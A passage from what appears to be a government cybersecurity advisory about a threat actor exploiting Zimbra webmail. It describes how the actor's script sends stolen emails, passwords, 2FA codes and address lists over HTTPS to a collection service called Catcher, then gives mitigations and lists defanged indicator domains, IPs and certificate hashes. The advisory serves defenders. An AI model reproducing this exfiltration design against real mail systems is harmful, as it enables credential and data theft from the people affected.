<caption><em><strong>Table 4: HTTPS exfiltration types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>Content Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>URL Path </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/json </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/p </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/octet-stream </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/d </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%207.png?itok=CdTcyMdN" width="1024" height="50" alt="Figure 7: Structure for information exfiltrated by HTTPS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 7: Structure for information exfiltrated by HTTPS</strong></em></figcaption>
  </figure>
<p>Some of the data transmitted via HTTPS uses the standard JSON content type format. The script includes the information in a POST request to actor-controlled infrastructure.  </p>
<p><a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> provides a summary of the JSON-based exfiltration.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 5: HTTPS JSON exfiltration  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>JSON Key(s) </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>email </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Client Type, Version, and Current URL </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>client, version, full_url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>app_password </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>autocomplete_password </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script transmits all HTTPS exfiltration not identified in <a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> using the Octet-Stream content type as binary data. The POST requests for this method include a filename in the “X-Filename” header. Traditionally, developers use headers prefixed with “X-” to denote custom headers that do not follow a defined standard. The purpose of including this header remains unclear since the Catcher capability ignores the provided filename when saving the data. <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> summarizes the data exfiltrated in this format.</p>
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<div class="TableContainer Ltr SCXW189907655 BCX8">
<div class="WACAltTextDescribedBy SCXW189907655 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong> Table 6: HTTPS binary exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>X-Filename Header </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetScratchCodesRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Victim Organization’s Global Address List </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetry_{1-20}.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Last 90 Days of Victim’s Emails </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>sendArchives </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetryData_{0-89}.json </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The script sends all exfiltrated data identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> to the Catcher service exactly as received from the SOAP request in a JSON payload, except for email exfiltration. For email exfiltration, the script sends it as a GZIP compressed archive [<a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank">T1560</a>]. Although most of the exfiltration consists of valid JSON, the script still attempts to exfiltrate all information identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> using the application/octet-stream content typing rather than application/json.</p>
<p>At the beginning and end of the collection and exfiltration activity, during the <em>sendStartPing</em> and <em>sendFinishPing </em>stages respectively, the script submits a POST request with a JSON payload to indicate that the script is starting or finishing execution. Throughout execution, the script also logs error events and send the logs using similar JSON payloads. The script sends the JSON in a POST request to the URL documented in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>, using a URL path of “/v/p” and with a “subtype” key that shows which type of action it logged (<em>start, finish, or error</em>).  </p>
<h4><strong>Catcher</strong></h4>
<p><em>Ulej </em>exfiltrates information to Flowerbed to be handled by a service named Catcher. Catcher is a containerized Python application, running in Docker as part of Flowerbed, which is detailed in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section. It receives exfiltrated data and temporarily stores it, enabling its eventual transfer to infrastructure designed for long-term, secure storage.</p>
<p>Catcher acts as an HTTP server over port 8000 and a DNS server on port 53. As described in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section, the Flowerbed project uses an additional Docker container running an Nginx reverse proxy to enable HTTPS support. This reverse proxy uses a certificate generated by Let’s Encrypt and forwards all traffic with an SNI containing “*.i.*” to port 8000 within the Catcher container.</p>
<p>The DNS service can accept A, AAAA, MX, TXT, and CAA queries. For any MX, AAAA, or CAA queries, the server will always provide an empty response. The system only supports TXT records as needed to process Automatic Certificate Management Environment (ACME) requests, which enable the assignment of Let’s Encrypt certificates. If the server receives an A query, Catcher will always respond with the public IP address of the Flowerbed server.  </p>
<p>However, if a query includes a domain formatted as shown in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>, the service saves a log file in JSON format to disk containing the following details of the DNS query:</p>
<ul>
<li>Time of query,</li>
<li>Source IP address for query,</li>
<li>Queried domain, and</li>
<li>Type of query.</li>
</ul>
<p>The HTTP server typically responds with OK, except in cases where the path is “pixel.gif” when the response contains a 1x1 gif image with a SHA-256 hash of ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629. Like the DNS service, the HTTP service will only log entries when the domain found in the host header of the request follows the expected formatting as seen in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>. As the HTTPS exfiltration uses non-standardized binary and JSON-formatted payloads when exfiltrating to Catcher, Catcher will check the content type of the request. If the content type is set to “application/json”, Catcher encodes the data in Base64 and includes it in the JSON log entry written to disk. If the content type is set to any other value, Catcher leaves the Base64 payload in the JSON log entry blank and saves the payload to a separate file with the same filename as the JSON log entry with a “.bin” file extension. An HTTPS exfiltration event causes Catcher to save a JSON formatted log file to disk containing the following information from the HTTP request:</p>
<ul>
<li>Time,</li>
<li>Source IP address,</li>
<li>Request method,</li>
<li>Host,</li>
<li>Path,</li>
<li>Query string,</li>
<li>Headers, and</li>
<li>Base64 payload.</li>
</ul>
<p>These JSON event log files and binary output files are then initially saved to the directory <em>/root/hits/tmp</em> and later moved to the <em>/root/hits/ready</em> directory once processed. This prevents incomplete files, which are still being uploaded to Catcher, from premature exfiltration from the server. Approximately every 60 seconds, a likely automated workflow establishes a Secure Shell (SSH) connection with the server hosting Flowerbed for a few seconds, almost certainly exfiltrating the data processed by Catcher to non-public-facing infrastructure. The command in <a href="https://www.cisa.gov/#figure8"><strong>Figure 8</strong></a> also executes hourly to remove all files last modified at least two days ago from the <em>/root/hits/ready</em> directory.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%208-Command%20used%20for%20automated%20directory%20cleanup.png?itok=IqvZvbLK" width="1024" height="92" alt="Figure 8: Command used for automated directory cleanup">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 8: Command used for automated directory cleanup</strong></em></figcaption>
  </figure>
<h2><strong>Response strategies</strong></h2>
<h3><em><strong>Mitigations</strong></em><a class="ck-anchor"></a></h3>
<p>In many cases, by the time an organization identifies a compromise related to this campaign, numerous sensitive and proprietary emails have already been exfiltrated. The significant risk posed by this cyber threat emphasizes the importance for organizations that use ZCS and other similar webmail solutions to take proactive steps to mitigate this risk.</p>
<p>All organizations that use the ZCS webmail service should <strong>immediately prioritize</strong> ensuring that their ZCS is not running a vulnerable version. A patch for <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> was released for both 10.1.13 and 10.0.18 versions of ZCS [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening">D3-AH</a>]. If immediate patching is not feasible, organizations should advise employees to use alternative mail clients to access email and avoid using the Classic ZCS webmail client until ZCS is updated to a non-vulnerable version [<a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank">d3f:Isolate</a>].</p>
<p>System administrators should closely monitor any Internet-connected ZCS or other email systems and the workstations that access those systems and promptly apply available software updates [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank">D3-AH</a>]. Administrators can maintain awareness of active vulnerability exploitation by referencing open source resources, including <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA’s Known Exploited Vulnerabilities Catalog</a> and <a href="https://www.ncsc.gov.uk/collection/vulnerability-management/guidance/responding-to-active-exploitation" target="_blank">NCSC-UK’s Responding to active exploitation of vulnerabilities</a> guidance.</p>
<p>Organizations should consider using a third-party authentication service that supports passkeys for authentication to mediate access to ZCS and other services that do not natively support passkeys. By doing so, organizations can work to eliminate the possibility of automated password collection from autocomplete or password reuse [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank">D3-CH</a>]. However, Application Passcodes may still be necessary and should be monitored closely.  </p>
<p>Organizations should implement network monitoring capabilities with collection and short-term retention of packet capture or NetFlow data and maintain log collection and storage [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainLogCollectionStorage3Q">CPG 3.Q</a>]. This will allow organizations to monitor for and identify suspicious network activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IdentifyAdverseEvents4B">CPG 4.B</a>], such as:</p>
<ul>
<li>Significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank">D3-NTA</a>];</li>
<li>Frequent DNS queries for a suspicious domain with seemingly random subdomains [<a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank">D3-DNSTA</a>];</li>
<li>A sudden spike of connections to a server associated with a recently established domain [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>]; and  </li>
<li>Connections to internal services, such as webmail, from VPN providers frequently leveraged by this group for nefarious activity, such as Mullvad VPN [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>].</li>
</ul>
<p>Additionally, for organizations that can inspect the content of outbound HTTPS connections via break-and-inspect infrastructure, security teams should identify traffic matching the characteristics described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory.</p>
<h3><em><strong>Indicators of compromise (IOCs)</strong></em><a class="ck-anchor"></a></h3>
<h4><strong>Flowerbed infrastructure</strong></h4>
<p>The following indicators have been attributed to use by LAUNDRY BEAR for their campaign targeting ZCS’s webmail service as of the publication of this advisory. (<strong>Disclaimer: </strong>Due to the frequency of operational structure changes by this group, these indicators are intended solely for historic attribution purposes. Some indicators, such as IPs, compromised emails, and domains, may be outdated, so organizations should check for current activity before acting on these IOCs.) <a href="https://www.cisa.gov/#table7"><strong>Table 7</strong></a> provides details about the server infrastructure used to host Flowerbed, and <a href="https://www.cisa.gov/#table8"><strong>Table 8</strong></a> lists the corresponding SHA-1 hash values for the Let’s Encrypt certificates used by that infrastructure [<a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank">D3-IAA</a>].</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 7: Flowerbed server infrastructure</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Domain </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>IP Address </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]104 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>8 July 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>15 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]18 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 August 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>14 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>37.120.247[.]228 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>185.86.79[.]95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>104.248.134[.]194 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>11 November 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>17 February 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>64.226.124[.]190 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 December 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>193.238.152[.]66 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 January 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]64 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>3 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>194.156.103[.]193 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>5 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 8: Flowerbed X.509 certificate SHA-1 hashes  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Associated Domain </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>X.509 SHA-1 Hash </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>2e4f314bc9943cab5005d6fde0b271c74d47bc9d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Jul 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>50a87d926621dd06389ba50d86e0ff574ed713a8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>13 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>c5a72420e7bb308d078e62128430897f82194c95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>20 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>14 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8959c4d29e29f02ea94ea8bb21c8df2594c5549d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>24 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Nov 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>62eb76432597694edb01c1fe57aab0cfe03a7178 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>25 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
